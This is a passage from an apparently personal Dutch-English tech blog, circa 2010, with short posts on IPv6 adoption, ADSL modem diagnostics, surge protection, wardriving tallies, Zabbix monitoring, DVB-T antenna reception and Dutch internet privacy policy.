Note the This product is no longer available in the current Trust assortment on the Trust website. I bought it at mycom: Trust UPS & Overspanningsbeveiliging Surge PW-3500 - MyCom.nl and I noticed on the outside of the package that it does not mention whether it can be used with an ADSL modem, it just mentions phones and fax machines. A note about suppressing high-frequency interference made me wonder whether it might filter high-frequency signals on the phone line a bit too much, killing ADSL throughput. The salesperson at MyCom could not tell either. But MyCom has customer friendly policies for returning articles which aren't what you expected. Even "I could not make it run with Linux" is a valid reason for returning it. So I took it home, and first thing I noticed in the manual inside the package is that it states that this surge protector is also designed for ADSL. They could have mentioned that on the outside.

So now it is living in the phone line (and power supply) for the ADSL line.

In een volgens mij lange traditie heeft XS4ALL afscheid genomen van niet altijd even goed meewerkende hardware met een doffe dreun: 3FM ekstra weekend uit het raam: de Alteon loadbalancer van xs4all.
Volgens mij was er al in 1993 een (telefoon)modem wat bij buitendienststelling zeker een kopje water zou krijgen, alleen kan ik het verhaal niet terugvinden.

Noticed something new in the twitter user-interface today: "Who to follow". On the first view it sounds a bit like the amazon "People who bought this item might also like" where buying a book about parachute diving will give you a recommendation for clean underwear. But who I follow is a decision I make myself, and I need more information.

So, my recommendations to Twitter:

• An off-switch. Completely, not just collapsing it but gone from my view.
• An information popup when I hover over the name just like in the timeline.
• An off-switch. I mean it.
• While you are at it: an off-switch for 'trending'.
• Did I mention the option to switch it off?

After reading When Lightning Strikes - by Johannes Ullrich - ISC sans diary I was reminded that I could do a bit more about surge protection. We don't live in Florida, but we have do have lightning storms and they can damage equipment.

The first step was easy: Rerouted a few cables, and now the incoming ISDN line goes through the network/phone/isdn surge protector on the APC back-ups CS 350VA. The surge protector is there, so it is a better idea to use it. I have seen the inside of an ISDN adsl splitter after a lightning strike and that was not a good sight.

Maybe I'll get a surge protector for the adsl modem too.

Soms is er tussen de rants, hacks en ipv6 promotie tijd voor heel ander persoonlijk nieuws:

Ik hoop vader te worden in december van dit jaar.

Het is nu al een bijzondere ervaring, en dat zal het straks vast nog veel meer worden.

---

Sometimes between all the rants, hacks and ipv6 promotion it is time for quite different personal news:

I hope to become a father in december of this year.

It is already a special experience, and it will probably get more special.

Vorige week bestelde ik wat bij de free record shop. Voor de voortgang was (natuurlijk) een e-mail adres nodig maar ik heb het "ontvang onze nieuwsbrief" vinkje toch echt uitgezet.

Maar toch..

From: Free Record Shop                           
Subject: Beste Koos, je kunt nu ook muziek downloaden via FRS.nl!               

..

Je ontvangt deze e-mail omdat je je hebt aangemeld voor de nieuwsbrief.      

Nee dat heb ik niet. Gelukkig heb ik een weggooibaar e-mail adres gebruikt.

Maar ik had van een bedrijf als freerecordshop beter verwacht. Zaken doen op Internet anno 2010 en dan een e-mail adres gelijk ongewenste e-mail sturen is op z'n zachts gezegd geen reclame.

There is an interesting relation between 'website with technical subject' and 'visitors with IPv6'. I counted the number of unique addresses of visitors via IPv6 to several websites I run for the month of July 2010 and found the following percentages:

• http://weather.idefix.net/ weather maps : 5% (1%)
• http://pictures.idefix.net/ pictures : 4% (2%)
• http://idefix.net/ my homepage : 2% (1%)
• http://netwerk.pcgg.nl/ hcc!pcgg netwerkgroep : 2% (2%)
• http://bbs.idefix.net/ BBS files : 1%
• http://webcam.idefix.net/ the webcam : <1%
• http://www.virtualbookcase.com/ The Virtual Bookcase : < 1%
• http://www.camp-wireless.org/ Camp Wireless : < 1%

Comparing it to July 2009 (percentages between parentheses) does show growth.

I've done some work on the weather map site. I'm improving the plotting script to have a better abstraction of data and plotting so I can do plots for multiple countries.

As a first I'm plotting Denmark. The reasons are simple: it's a not too big country and has a reasonable number of weather stations.

Weather maps Denmark.

Now to see if that gives visitors :)

I wanted to install an extra package on the wardriving box but found out that the choice of distribution: Debian etch is not available anymore, not even as 'oldstable'. A bit of searching finds that I need to look in the Debian distribution archives.

I'm not sure whether I'll keep using Debian versions for the wardrive-box. I want something nice and small and manageable, and the option for a custom kernel (no initrd, preferably no udev).

The interesting bit is that I built the wardriving box in January - February 2008 and it basically ran regularly since that time without software problems.

The extra package I wanted to try is lm_sensors, for the other project: Sundial. I was wondering how high/low the system temperature would get, and whether it would stay within the 0 - 50 ⁰C range. An IP55 rated case might be a good idea for use in the garden shed (which is semi-outdoors). The question is will the mainboard stay above 0 ⁰C when it is -15 ⁰C outside. I know from the wardriving box the Alix board generates some heat, but is it enough to keep itself warm.

The Alix.1c/1d have a temperature sensor, according to Getting started with voyage linux it should work with the w83627hf driver which indeed loads and gives a readout.

I came across the alix.1 series hardware while looking for something low-power for project sundial. Later calculations showed the 'powered by the sun or wind' part of that project would be too expensive compared to just using a plug.

Update: The archived etch works, but lm-sensors wants perl, which is not part of the stripped down debian on the wardrive box. For as far as I can see that is because there is one perl script included. Time to rebuild from source with that script removed.

Update 2010-08-03: Looking where you are going helps too: Voyage Linux is Debian-based but optimized for embedded apps. With debootstrap under Ubuntu or Debian I could set up a newer development environment for the wardrive box and test Voyage Linux.

Wardriving results 15 July - 1 August: 2800 new networks with GPS locations. I went down a few places in the WiGLE stats because other people found a lot more networks. That can happen. Maybe I'll catch up :)

XKCD: University Website, Randall Munroe, licentie Creative Commons Attribution-NonCommercial.

De XKCD: University Website is briljant. En uiterst herkenbaar. Precies de disjunctie die ik nu bij de Universiteit Utrecht in de verte hoor voorbij komen. Maar net zo goed wat ik meer dan 10 jaar geleden bij de Hogeschool van Utrecht hoorde. Ver daarvoor waren er wel projecten die er van uitgingen wat mensen zouden zoeken, maar zo tegen 2000 ging dat allemaal overboord en kwamen in plaats daarvan monster websites waar alles zou moeten staan wat volgens de voorlichters ooit gevraagd zou kunnen worden door bezoekers van de website, die daarvoor braaf op de homepage zouden beginnen en door allemaal hierarchische structuren heen zouden klikken. Direct linken naar het juiste onderwerp is volgens die voorlichters ook vooral niet de bedoeling.

Ik ben blij dat deze ergernis voor mij over is en dat ik er alleen nog maar vanaf de verre zijlijn om kan lachen. En als gebruiker van de website natuurlijk niet kan vinden wat ik zoek. Maar daar helpt google bij.

Update: Ook gemeld in het Digitale U-Blad met de titel Web.. some sense? naar aanleiding van het UU webpresence project wat al getypeerd is als Web Absence.

At work one of my main projects at the moment is improving monitoring for beta-ict. I am used to mon at the computer science department but that shows its age a bit and I wanted to try something newer.

The choice in monitoring system was mainly for something which could monitor both system variables (free disk space, free memory, system load, whether certain needed processes were running) and service availability (is the network available, is ldap available, are web servers up and not giving out weird error messages).

I chose zabbix. It has an interesting approach: it measures variables, stores results and trends and then you can do stuff with the stored data. Such as monitoring whether certain thresholds aren't crossed, so you can do your normal tests. Or more complicated monitoring of trends or changes. But you can also make graphs of that same data. And you can use the triggers to make nice long-term availability reports.

One thing I learned is that the suggestion in the manual to use a new version postgres (>= 8.3) is to be taken serious. With 8.0 the server running zabbix regularly got up to a load of 10 on adding new systems to be monitored and historic monitoring data was lost for certain time periods. Dumping the database, installing postgres 8.4 and importing the data again and continuing with the same setup made everything lots faster and no data has been lost since.

What is also interesting is the option to use remote proxies to gather data from otherwise firewalled networks and the option to split servers / services into groups. Eventually we may give the 1st-line servicedesk their own view of our zabbix server where they can view whether main services are available so they are aware of troubles before they need to ask us.

Again and again you see responses to IPv4-will-run-out stories like "but what if we reclaim space from ..." or "but what if we use more NAT". I found one of the best answers to all of these:

Optimizing the utilization of less than 25% of the address space in the face of the consumption rate on the 75% side simply cannot yield a meaningful result. It really is akin to rearranging the deck chairs on the Titanic.

Source: Re: Rate of growth on IPv6 not fast enough? and used several times before on IPv6 mailing lists.

In wat al de bijnaam / hashtag #censuurknop heeft het ministerie van justitie vandaag een wetsvoorstel gelanceerd om nog meer rechten naar zich toe trekken en een wetsbepaling te schrappen die juist als doel had censuur van staatswege te voorkomen. Het openbaar ministerie wil zonder tussenkomst van een rechter websites kunnen blokkeren of verwijderen.

De huidige tekst:

De ratio van de regeling is, zoals eerder aangegeven, de vrijheid van meningsuiting te ondersteunen. Artikel 7 van de Grondwet geeft aan de overheid de opdracht de vrijheid van meningsuiting te waarborgen en te stimuleren. Censuur van staatswege dient te worden voorkomen. Artikel 54a beoogt het gevaar in te dammen dat de tussenpersoon, mede gelet op zijn in belang toenemende rol in het proces van gegevensuitwisseling door middel van communicatienetwerken, zich genoodzaakt voelt tot preventieve censuur over te gaan teneinde strafrechtelijke aansprakelijkheid te voorkomen. De regeling dient een onbelemmerde informatie-uitwisseling en daarmee een grondbeginsel van de democratische rechtsstaat.

Bron: Aanpassingswet richtlijn inzake elektronische handel; Memorie van toelichting

Burgers van Nederland kunnen nog tot 30 September 2010 commentaar leveren op dit voorstel. Zoals het er staat in de Consultatie wetsvoorstel versterking bestrijding computercriminaliteit gaat het om het voorkomen van misbruik en staat daar niet 'Censuur van staatswege dient mogelijk gemaakt te worden'. Maar onze grondrechten vereisen dat justitie nooit dit soort vergaande maatregelen kan nemen zonder goedkeuring van een rechter.

Zoals bij de internetconsultatie staat worden opmerkingen gevraagd, met een voorkeur voor heldere en beknopte commentaren voorzien van een duidelijke motivering.

Ik nodig iedereen uit een reactie te geven (en juist graag die heldere, beknopte, leesbare en gemotiveerde reactie..). Al is het alleen maar om justitie duidelijk te maken dat onze grondrechten veel belangrijker zijn dan hun wensen voor een politiestaat.

Bron: Wetsvoorstel: OM krijgt aan/uit-knop voor websites - Bits of Freedom

Blijkbaar is Nederland goed kwa IPv6 voorbereidingen, maar gemiddeld kwa echte uitrol, volgens onderzoek door TNO: IPv6 Monitoring in Nederland: De Nulmeting.

Conclusies:

In vergelijking met ons omringende landen loopt Nederland mee in de voorhoede als het gaat om voorbereidingen voor de uitrol van IPv6. Nederland presteert gemiddeld als het gaat om de daadwerkelijke uitrol van IPv6.

En voor bijna ISPs om over na te denken en dan ook vooral iets mee te doen:

Indien aangenomen wordt dat de IPv4 adressen opraken tussen september 2011 en november 2012 dan is de voornaamste zorg het kunnen bieden van een IPv6 verbinding aan eindgebruikers.

Wanneer gaat uw ISP IPv6 aanbieden?

Het lijkt alleen maar erger te worden (of te zijn) met het Centraal Informatiepunt Onderzoek Telecommunicatie (CIOT) blijkt uit de laatste gegevens opsporingsdiensten negeren privacyregels telecomdatabank stelselmatig - Bits of Freedom. Omdat er geen enkele controle is of opvragingen rechtmatig zijn en geen enkele werkende notificatie naar de mensen wiens gegevens opgevraagd zijn gebruiken de opsporingsdiensten dus de ciot databank als een soort enorme grabbelton. De enige manier waarop dit veilig zou kunnen werken is dat er niet alleen duidelijke en strenge regels zijn (wat mij betreft kunnen die zijn "opsporingsambtenaren mogen alleen gebruiks-gegevens opvragen van een verdachte die verzameld zijn nadat een rechter toestemming heeft gegeven specifiek gegevens van die verdachte te gaan onderzoeken") maar dat er ook sancties op misbruik zijn. En geen sancties van het type "stout hoor, niet meer doen!" maar geldboetes bij overtredingen en ontslag op staande voet bij herhaalde overtredingen, en aan de persoon wiens gegevens ten onrechte zijn ingezien de optie geven om ook schadevergoeding te eisen. Alleen als de controleurs goed gecotroleerd worden zullen ze zich zelf aan de wet houden.

Eindrapport Audit CIOT 2009 (19.04.10) (PDF)
Eindrapport Audit CIOT 2008 (PDF)
Bits of Freedom, 'Analyse: pratijk bevragingen CIOT bijzonder zorgwekkend' (06.11.2009)

Update 2010-07-27: Tweede kamerlid Jeanine Hennis-Plasschaert (VVD) heeft kamervragen gesteld over de herhalende privacy schendingen met als achtergrond dat de samenleving moet kunnen vertrouwen op het correct werken van justitie. Bron: Minister moet privacyschending CIOT verantwoorden - nu.nl.

Mijn persoonlijke visie is dat justitie in de uitvoering vaak de gedachte lijkt aan te hangen "We zijn er om de wet te handhaven en niet om ons er aan te houden" dus ik heb dat vertrouwen allang niet meer. Maar als zelfs VVDers hier kritisch naar gaan kijken is het eerdere vertrouwen wat soms gewoon overkwam als blind vertrouwen (bij bijvoorbeeld Fred Teeven) echt aan het afnemen.

According to Google finally indexing the IPv6 internet - Fix6 the first sightings have been done of a googlebot with an IPv6 address. My IPv6-reachable websites haven't been blessed by a visit from the IPv6 googlebot yet. What will googlebot do when I post a link to http://[2001:980:14ca:42::18] ?

And on a different note about google: last year I noticed googledns did not give out AAAA records for www.google.com. I retested it and found it (now?) depends on where you ask. At a place not in the google IPv6 program:

koos@kolham:~$ dig +short @8.8.8.8 www.google.com aaaa
www.l.google.com.
koos@kolham:~$ dig +short @8.8.4.4 www.google.com aaaa
www.l.google.com.
koos@kolham:~$ 

And at a place in the google IPv6 program:

koos@greenblatt:~$ dig +short @8.8.8.8 www.google.com aaaa
www.l.google.com.
2a00:1450:8001::63
koos@greenblatt:~$ dig +short @8.8.4.4 www.google.com aaaa
www.l.google.com.
2a00:1450:8001::63
koos@greenblatt:~$ 

Yes, that first place needs to turn their plans about IPv6 into doing something with it.

Ik ben blij dat ik geen mobiel Internet van T-mobile gebruik: T-Mobile wil websites laten betalen voor doorgifte - Bits of Freedom waar ik mijn eigen commentaar aan heb toegevoegd (het lijkt weer ouderwets "bellheads versus netheads").

Ook een mooie actie: Neelie Kroes krijgt van een mobiele aanbieder een sms die de regels over hoge tarieven wel erg typisch uitlegt. Jammer voor die provider dat Neelie Kroes zelf die regels heeft (mee-) bedacht.

De SpeedTouch 510 levert ook interresante getallen op:

[adsl]=>:adsl info
Modemstate            :  up 
Operation Mode        :  G.DMT Annex B  [ISDN Overlay Mode]
Channel Mode          :  interleaved 
Number of resets      :  2 

Vendor                              Local           Remote   
  Country             :               0f               b5 
  Vendor              :             ALCB             BDCM 
  VendorSpecific      :             0000             6291 
  StandardRevisionNr  :               01               01 

                                  Downstream        Upstream 
Margin       [dB]     :              6.5              9.0 
Attenuation  [dB]     :             24.0             12.0 
OutputPower  [dBm]    :             18.5             12.0 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            16905             7168 
  Upstream            :             2113              896 

Transfer statistics

    Errors 
      Received FEC    :              988 
      Received CRC    :              583 
      Received HEC    :              447 
      Transmitted FEC :               21 
      Transmitted CRC :               42 
      Tranmsitted HEC :               34 

Nog geen 8 megabit (het is geen adsl2 of adsl2+, dus ergens bij 8000 zit wel de limiet) en de errorcounters lopen al op.

Gisterenavond maar eens de xs4all klantenservice gebeld over de matige ADSL snelheid en de regelmatige hikken. Dat was even flink in de wacht staan: ondanks de aankondiging dat het "iets meer dan 1 minuut wachttijd" zou zijn duurde het bijna 25 minuten om iemand aan de lijn te krijgen. Eigenlijk wilde ik gewoon een downgrade naar 8 megabit om van het probleem af te zijn. Maar aan de hand van mijn beschrijving van de problemen en de metingen en logs aan de kant van xs4all kwam de medewerker van de klantenservice met de suggestie dat het wel eens een storing aan het modem of aan de telefoonlijn zou kunnen zijn. De aanpak is nu om het eens met een ander modem te proberen, en aan de hand van wat dat oplevert KPN er op uit te sturen om eventuele roestige verbindingen in de lijn te vinden en/of alsnog een downgrade aan te vragen. Ik ben eens begonnen met het modem van ADSL2+ mode terug te zetten naar ADSL2 en dat levert interresante getallen op:

=>:adsl info
Modemstate            :  up 
Operation Mode        :  G.992.3 Annex B
Channel Mode          :  interleaved 
Number of resets      :  116 

Vendor                              Local           Remote   
  Country             :               0f               b5 
  Vendor              :             TMMB             BDCM 
  VendorSpecific      :             0000             ff91 
  StandardRevisionNr  :               00               02 

                                  Downstream        Upstream 
Margin       [dB]     :              8.0              8.0 
Attenuation  [dB]     :             18.5             12.0 
OutputPower  [dBm]    :             19.0             12.5 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            18030             7645 
  Upstream            :             2426             1029 

Transfer statistics
    Errors 
      Received FEC    :          2333249 
      Received CRC    :           305427 
      Received HEC    :            14957 
      Transmitted FEC :                0 
      Transmitted CRC :           123909 
      Transmitted HEC :           230400 

ondanks dat de snelheid aangepast is blijven er relatief veel errors langskomen. Vanavond eens met een SpeedTouch ST510i proberen, en ik heb binnenkort beschikking over een andere ST546i.

Even een warm hart toedragen aan de goede zaak:

Persbericht IPv6 taskforce

Donderdag 25 november worden voor de tweede keer de IPv6 Awards uitgereikt aan de beste Nederlandse implementaties. Als IPv6 Task Force roepen wij bedrijven, internet service providers, overheden, onderwijsinstellingen en ook particulieren op zich aan te melden voor de IPv6 awards 2010. Heeft u een toepassing op het gebied van IPv6 geïmplementeerd? Schrijf u dan voor 1 november in voor de IPv6 Awards 2010 en maak kans op een mooie prijs!

Prijzen per categorie

• Bedrijfsleven: €10.000,-
• Overheid & Not for profit: winnaar van deze categorie ontvangt een week senior consultancy, vrij opneembaar
• Onderwijs & onderzoeksinstellingen: €15.000,-
• Internet Service Providers: €15.000,-
• Particulieren: winnaar van deze categorie ontvangt een laptop met gratis gebruik van één jaar mobiel internet en KPN Hotspots
• Publicatie & onderzoekscurriculum: winnaar van deze categorie ontvangt een laptop met gratis gebruik van één jaar mobiel internet en KPN Hotspots

Bij het selecteren van de winnaars zal de jury letten op motivatie, relevantie, toewijding, implementatie en impact. De prijzen zijn beschikbaar gesteld door: KPN, Stichting NLnet, SIDN, Stratix, SURFnet, XS4ALL

De uitreiking van de awards zal plaatsvinden op donderdag 25 november tijdens het ECP-EPN jaarcongres in het Fortis Circus theater in Scheveningen. Voor meer informatie over de IPv6 awards of om direct in te schrijven: http://www.ipv6-taskforce.nl/awards/.

Noodzakelijke overstap naar IPv6

Door een alsmaar grootschaliger gebruik van het internet raken de huidige adresreeksen op hetinternet (IPv4) in 2011 op. Om ervoor te zorgen dat dit niet tot problemen leidt is er een nieuw adressysteem, genaamd IPv6, bedacht. Het is belangrijk dat Nederlandse bedrijven, internet service providers, overheden, onderwijsinstellingen en ook particulieren gaan beseffen dat de overstap naar dit nieuwe adressysteem noodzakelijk is en dat zij tijdig maatregelen kunnen en moeten nemen om de overstap naar IPv6 mogelijk te maken (en de kosten onder controle te houden). Goede implementaties van IPv6 kunnen volgens de IPv6 Task Force een voorbeeldfunctie hebben.

Vandaag had ik de tijd om even langs het xmsnet huis in Utrecht te gaan om eens te vragen naar de voortgang. Ik heb tijden geleden aangegeven bij de xmsnet utrecht postcodecheck dat ik wel interresse heb, maar daar kwam nooit een reactie op. Een medewerker van xmsnet heeft het even nagevraagd en de aanvraag is keurig opgenomen in het systeem maar de interesse in onze buurt is niet groot genoeg op dit moment om te gaan graven, en dat kan afhankelijk van allerlei factoren nog maanden of jaren duren.

Het fiber-to-my-home project schiet dus nog niet op. En dat terwijl het televisie aanbod bij xmsnet (van glashart media) al het verschil met ziggo basis televisie waard is. Technisch op den duur ook: opnemen van digitale televisie met behulp van de computer is iets wat door xmsnet niet geblokkeerd wordt.

Misschien toch maar eens wat buren enthousiast proberen te maken. Dat helpt altijd volgens de mensen van xmsnet. Hallo buren in "Plan 60" in Overvecht in Utrecht: U wilt glasvezel van xmsnet.
Update 2010-07-19: In andere gebieden van Nederland gaat de glasvezel makkelijker: Henk van de Kamer kan in Aalten glasvezel verwachten. En doet dat dus ook van harte. Opmerkelijk is ook dat als 40% van de potentiele aansluitingen zich vooraanmelden het aangelegd kan worden naar alle aanmelders en bij 60% naar alle potentiele aansluitingen, waarbij de niet-klanten dan gewoon een glasvezel koppelpunt in de meterkast krijgen waar verder geen diensten op aangeboden worden. Op zich is dat natuurlijk wel iets wat je huis potentieel meer waard maakt, een glasvezel koppelpunt in de meterkast. Jammer dat je als huiseigenaar in dit land nog nergens de mogelijkheid hebt om te zeggen "doe maar, en ik neem (een deel van) de initiele investering over".

Wardriving results 24 April - 14 July: 9419 new networks with GPS locations according to WiGLE.

The Hurricane Electric IPv4 Exhaustion Counter on this page has dropped below 365 days. What does this mean exactly?

At the end of that period there will be no more IPv4 address blocks to give out to the several Regional Internet Registries. But those have their own buffers so it won't be all over at that moment (and the IPv4 Internet will not stop functioning either).

What will happen is that when those buffers run out the moment will come that one of those Regional Internet Registries will have to answer "NO, not available" to a request for IPv4 space. The timeframe at which this will happen may vary between months (APNIC, Asia-Pacific region) and years (AfriNIC, Africa) given the current rates. What this will mean is a situation where IPv6 is the only working way to give new systems on the Internet working unique addresses. Will the world be ready for this moment? Probably not.

Het reactieformulier van de Gemeente Utrecht werkt, ik heb er al een paar keer wat ingestuurd en alle keren een nette reactie op gehad. Recent vroeg ik of de gemeentebelastingen ook betaald zouden kunnen worden via de digitale nota en dat bleek op de planning te staan voor 2011. Ik heb nu eenmaal liever iets met controle voor ik betaal en dus niet automatische incasso, wat ze de laatste jaren wel aan het promoten waren. Maar het komt dus goed als de planning doorgaat.

In 2008 waren we op vakantie in Denemarken en het viel op dat in de landelijke gebieden van Jutland diverse projecten bezig waren om overal glasvezel aan te leggen. Deze projecten komen eigenlijk als gevolg van de overgang van bovengrondse elektriciteit naar ondergrondse, en als je begin 21e eeuw toch grondkabels aan het aanleggen bent is fiber aanleggen een relatief kleine extra moeite.

Hier heeft landelijk Denemarken dus een voorsprong door achterstand: Een upgrade aan het elektriciteitsnetwerk leverde een mogelijkheid om gelijk overal fiber aan te leggen. In Nederland is de overgang naar ondergrondse elektriciteitsnetwerken ergens in voor 1980 wel afgerond dus heeft men daar nergens fiber bij aangelegd. Misschien heeft er nog een televisie kabel net een goeie start mee gekregen.

Ondertussen kwam ik ook nog een uitleg over de grote uitrol in Denemarken tegen: Denen helpen friezen:

In het Deense Vejen ligt al sinds 2003 glasvezel in de grond. Na de zware storm van 1999 besloten de coöperatieve energiemaatschappijen een deel van hun elektriciteitsnetwerk te vernieuwen. In samenwerking met de gemeente werd toen besloten om ook meteen glasvezel te leggen. Dit geeft Vejen een bijzondere voorsprong.

Dat dit voor de elektriciteitsbedrijven een zeer lucratieve aanpak is blijkt wel uit Norwegian ISP: dig your own fiber trench, save $400 - Ars Technica:

Lyse didn't start out as a broadband company; before 2002, it was an electrical company that provided power to about 120,000 Norwegian homes. But it was good at infrastructure building, and in 2002 it decided to jump into the Internet game by deploying fiber to the home. That first year, it had only 500 customers; now, it has more than 130,000, making fiber even more important than electricity.

A night with a heavy thunderstorm and high numbers of lightning strikes detected. No local damage, we just saw hailstones come down, break up and the parts still fly around for over a meter. So we were glad we weren't outside at that time.

Available now: repocafe, our subversion self-service webinterface.

De website van het Antenneregister van het antennebureau van het Agentschap Telecom is (eindelijk) vernieuwd. Vaste installaties van radiozendamateurs zouden er ook in vermeld moeten gaan worden maar ik kan die laag nog niet aanzetten en ik zie ze ook niet op de kaartjes.

Eindelijk zijn de overige gegevens ook bijgewerkt en staat de zendmast Lopik te IJsselstein er niet meer in met een stapel analoge televisiezenders maar met DVB-T zenders. Het valt me wel op hoeveel omroep zenders er eigenlijk in stedelijke gebieden staan, die verwachtte ik toch meer op plekken zoals de zendmast Lopik.

Gespot door Website Antenneregister (eindelijk) vernieuwd: behalve C2000 vrijwel alle antennes in kaart - FMCNL op Twitter

A sort-of information leak showing the link between IPv4 and IPv6 addresses (if you had any hope the link between those might be a secret):

Jul  8 15:15:25 abaris named[5327]: client 2001:470:xxxx:xxxx::2#33086: received notify for zone 'ckts.info'
Jul  8 15:15:25 abaris named[5327]: zone ckts.info/IN: refused notify from non-master: 2001:470:xxxx:xxxx::2#33086
Jul  8 15:15:25 abaris named[5327]: client 68.178.91.34#33085: received notify for zone 'ckts.info'
Jul  8 15:15:25 abaris named[5327]: zone ckts.info/IN: refused notify from non-master: 68.178.91.34#33085

Timing and portnumbers make it quite visible that those addresses are in use by the same machine. Other protocols can probably give the same results, for example with http and cookies I could link IPv4 and IPv6 addresses.

A problem? Not to me. Privacy by obscurity? Don't expect it.

Ik was benieuwd naar de HCC!dagen 2010, en ik zag in een nieuwsbericht van de HCC Thema's HCC!dagen 2010. Met als quote:

Hiermee doet HCC haar naam eer aan: HCC, de vereniging van computergebruikers!

Nee, HCC staat voor hobby computer club, maar dat willen ze allang niet meer zijn.

Soms moet je het niet kunnen vinden van uitleg omdat 'iedereen dat weet' omzetten in een eigen uitleg waarin juist al die dingen staan die 'iedereen weet'. Op de hoofdpagina van PI1UTR kon ik wel vinden

Graag de repeater terug linken naar reflector 17A ,vergeet u dit, dat kan gebeuren de repeater connect naar 15 minuten automatisch weer reflector 17A

Alleen niet hoe dat dan gaat, een reflector linken of unlinken. Iets wat voor een gloednieuwe D-STAR gebruiker niet direct logisch zal zijn. Met behulp van de Australian D-STAR Information en specifiek de Australian D-STAR Repeater Linking User Guide Version 1.1 kon ik beredeneren hoe dat moest, en dat heb ik beschreven op de D-STAR digitale amateur radio. Nu staat het eens ergens, en het is een goed startpunt om meer D-STAR procedures te documenteren. En mocht ik fouten maken in die pagina, dan klaagt er vast iemand.
Update 2010-07-08: En dan is er wel een handleiding te vinden: Hoe te linken - www.d-star.nl. Magoed, daar kan ik mijn aantekeningen mee vergelijken.

The vision of T-mobile USA for the near future: IPv6 is the network protocol, IPv4 is "legacy" and will be hidden behind NAT64 gateways. Content providers better take note:

"Our users are going to access your content over IPv6. The only relevant question is 'will we make the AAAA record or will you?' Wouldn't you rather be the one to do it so you have control?"

Time for content-providers to think about IPv6 strategy. Via T-Mobile is pushing IPv6. Hard. - Living with IPv6.

De ADSL lijnsnelheid is nogsteeds voodoo. Tijdens onze vakantie heeft het er zelfs een dag uitgelegen, maar dat was niet op ADSL niveau. Alleen kon er geen sessie opgebouwd worden met xs4all. Later in die vakantie ging de download snelheid naar 8083 kilobit en bleef daar. Na een softwarematig schopje in het modem ging de snelheid weer naar ruim 14 megabit maar na een poosje stabiliseerde het zich op 12334 kilobit. Het is dat er geen abonnement tussen 8 en 16 megabit zit, maar met al deze instabiliteit is 8 megabit misschien toch weer veiliger.

Slowly but surely the subversion self-service webinterface we developed at work is turning into a 2.0 version which will be available as open source. I must say "my boss developed", he did most of the coding. I just threw ideas, designs and criticism at him :)

It was our original plan to open-source it, and this plan was woken up again when we got a request about the availability of the source code. Lots of work was done to make structures more flexible and remove hardcoded dependencies on internal infrastructure.

One of the bigger design issues was a good name! For historical reasons we couldn't use the name repoman which was good wordplay on repository-manager in itself. We settled on repocafe. Available for download Real Soon Now™.

Back from a holiday in England! We stayed in a house which was an old manor, complete with a kitchen which once had a coal-fired Aga stove as a modernisation. More modern things like a microwave were added too, but the Aga stove was quite something. It already had the upgrade to heating oil. We cycled from home to the IJmuiden - Newcastle ferry and wanted to cycle from Newcastle to the cottage near Wooler. But the hills of Northumbria got us and we gave up after 65 kilometers and had someone with a car pick us up. We had a great week. One of the highlights was a visit to the Farne Islands were the opportunities for bird-watching and photography were enormous.

Cycling in England was doable: marked cycle routes from Newcastle were going where we wanted to go. Some cycleways are old railway lines and not all are paved. A recumbent and gravel do not mix very well. Most cycle routes are on quiet back roads but we did ride on some A-roads. Which was no problem: cars gave us space and were patient. But hills with up to 20% ascent got us eventually. Or rather the fact that after each hill comes another which makes the average speed go down a lot.

I used the opportunity to do my bit for the Mb21 UK broadcast gallery and cycled over to the Wooler transmitter to make a few pictures to add to the gallery.

Thinkbroadband, a site about ADSL/cable internet in the UK asked UK broadband providers about IPv6 and got some interesting answers, including:

"[IPv6] has not been released in the market"
"We support IP version 5, but I'm not too sure about 6"
"[We] would advise you to use version 4 [..] Version 6 never always works"

These are the companies which will face the IPv4 address shortage when you want a connection. Ok, these answers are from the support desk and not from network design but still...

Found via Broadband providers & router manufacturers failing to support IPv6 - Fix6.

In mijn werk heb ik natuurlijk ook veel te maken met de universitaire automatiseringsprojecten. Vandaag las ik een prachtige filosofische beschouwing van het leerlingvolgsysteem: God bestaat en zijn naam is OSIRIS.

You can now lose your privacy on facebook via IPv6 too! http://www.v6.facebook.com/. It won't make me visit facebook but it is good when such a popular service starts offering IPv6 connectivity. Facebook is also probably a big customer of load balancers and they can use that power to improve IPv6-capable load balancers. First spotted at Facebook over IPv6 - Fix6 IPv6 news and info.

I picked up the at this moment cheap outside DVB-T antenna from KPN which didn't even have a KPN logo, just Funke. It is the Funke DSC310. It came with 10 meter antenna cable and mounting materials. I went to Radio Centrum, the local electronics shop and picked up a König DVB-T power inserter. The mounting materials for the Funke antenna include a clamp for a pipe so I used a broomstick to raise the antenna out the window.

The results were spectacular. Depending on antenna orientation (the DSC310 is directional) I received 19 to 22 transmitters with in total 208 to 234 services (with a lot of duplicate Digitenne services). Details in the DVB-T reception log for 10 June 2010.

Notable new services: Digitenne multiplex 1 Zuid-Holland Zuid with TV Rijnmond and Digitenne multiplex 1 Zuid-Holland Noord with TV west.

Update 2010-06-13: I just noticed browsing those results with some more time and energy available that I also had WDR Mux 2 Aachen at 602 MHz in one direction, which is new for the home location. The reason I did not notice before is that my script to generate the logbook did not see that frequency as 'new' because I have seen it in Limburg, the southern part of the Netherlands.

According to DVB-T Frequenties - Wikipedia Nederland the 602 MHz transmitter is the one at Aachen-Stolberg which is 167 kilometer distance. A new DX record!

Distance calculations using Calculate distance, bearing and more between Latitude/Longitude points and normal reach calculations using VHF/UHF TV Line of Sight Calculator. The line of sight calculator shows me both this distance and the 112 kilometer to Sender Wesel are above the normal reach of those transmitters.

Ik zat weer eens te bladeren of er nog een leuke tweedehands antenne te vinden was voor de DVB-T DX experimenten en kwam deze tegen: Fuba yagi uhf tv type d. Gezien het specifieke type D en de lengte op de foto is dit een Fuba XC391-D en die is dus 2 meter 25 lang, volgens Frage zur Fuba XC391 Yagi - DIGITAL FERNSEHEN - Forum Duits. Een beetje ernstig groot voor een antenne die binnen blijft, dus die gaat het niet worden ook al is het erg weinig geld voor zo'n goeie UHF TV antenne. Zonder mast en rotor is dat geen handige antenne en ik heb even andere prioriteiten dan die op het dak knutselen.

Opmerkelijk is trouwens dat de buitenantenne voor Digitenne bij KPN momenteel 6.75 kost (verzendkosten?) terwijl volgens mij dezelfde Funke buitenantenne bij satshop 34.95 kost. Voor die 6.75 kan ik het niet laten, ik heb er ook een besteld bij KPN. Je hoeft er geen Digitenne klant voor te zijn.

Bron foto: 08-11-20 + Ophef - GALERIEopWEG Licentie: cc-by-sa

Een absoluut dieptepunt in de geschiktheid van hccnet.nl als e-mail provider:

   ----- Transcript of session follows -----
